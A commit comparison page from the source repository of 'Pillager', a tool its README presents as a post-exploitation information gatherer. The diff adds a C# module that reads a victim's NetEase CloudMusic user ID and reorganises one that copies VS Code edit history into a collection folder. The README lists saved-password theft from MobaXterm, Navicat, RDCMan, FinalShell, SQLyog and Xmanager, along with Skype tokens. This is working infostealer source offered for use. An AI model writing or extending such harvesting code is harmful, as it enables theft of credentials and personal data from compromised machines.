Compare commits

...

2 Commits

Author SHA1 Message Date
簞純 0d6814fa2c Update Program.cs 2024-01-24 13:42:28 +08:00
簞純 e9c60891e3 Add Netease CloudMusic 2024-01-24 13:38:48 +08:00
5 changed files with 51 additions and 14 deletions

View File

@ -82,12 +82,13 @@
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Helper\SQLiteHandler.cs" />
<Compile Include="Softwares\NeteaseCloudMusic.cs" />
<Compile Include="Tools\FinalShell.cs" />
<Compile Include="Tools\MobaXterm.cs" />
<Compile Include="Tools\Navicat.cs" />
<Compile Include="Tools\RDCMan.cs" />
<Compile Include="Tools\SQLyog.cs" />
<Compile Include="Tools\VSCode.cs" />
<Compile Include="Softwares\VSCode.cs" />
<Compile Include="Tools\Xmanager.cs" />
</ItemGroup>
<ItemGroup>

View File

@ -5,6 +5,7 @@ using Pillager.Helper;
using Pillager.Mails;
using Pillager.Messengers;
using Pillager.Others;
using Pillager.Softwares;
using Pillager.Tools;
namespace Pillager
@ -39,9 +40,12 @@ namespace Pillager
Navicat.Save(savepath);
RDCMan.Save(savepath);
FinalShell.Save(savepath);
VSCode.Save(savepath);
SQLyog.Save(savepath);
//Softwares
VSCode.Save(savepath);
NeteaseCloudMusic.Save(savepath);
//Mail
MailMaster.Save(savepath);
Foxmail.Save(savepath);

View File

@ -0,0 +1,28 @@
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
namespace Pillager.Softwares
{
internal class NeteaseCloudMusic
{
public static string SoftwareName = "NeteaseCloudMusic";
public static void Save(string path)
{
try
{
string infopath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\CloudMusic\\info");
string info = File.ReadAllText(infopath);
if (string.IsNullOrEmpty(info)) return;
string savepath = Path.Combine(path, SoftwareName);
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "userinfo.url"), " [InternetShortcut]\r\nURL=https://music.163.com/#/user/home?id=" + info);
}
catch { }
}
}
}

View File

@ -5,11 +5,11 @@ using System.IO;
using System.Linq;
using System.Text;
namespace Pillager.Tools
namespace Pillager.Softwares
{
internal class VSCode
{
public static string ToolName = "VSCode";
public static string SoftwareName = "VSCode";
public static void Save(string path)
{
@ -17,7 +17,7 @@ namespace Pillager.Tools
{
string historypath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Code\\User\\History");
if (!Directory.Exists(historypath)) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, SoftwareName);
Directory.CreateDirectory(savepath);
Methods.CopyDirectory(historypath, Path.Combine(savepath, "History"), true);
}

View File

@ -49,15 +49,19 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
| Skype | Token |
| Enigma | DeviceID/Datebase |
| Tool | Support |
| :--------: | :-----------: |
| MobaXterm | Password |
| Xmanager | Password |
| RDCMan | Password |
| FinalShell | Password |
| Navicat | Password |
| VSCode | History Files |
| SQLyog | Password |
| Tool | Support |
| :--------: | :------: |
| MobaXterm | Password |
| Xmanager | Password |
| RDCMan | Password |
| FinalShell | Password |
| Navicat | Password |
| SQLyog | Password |
| Software | Support |
| :----------------: | :-----------: |
| VSCode | History Files |
| Netease CloudMusic | UserInfo |
| Mail | Support |
| :--------: | :------: |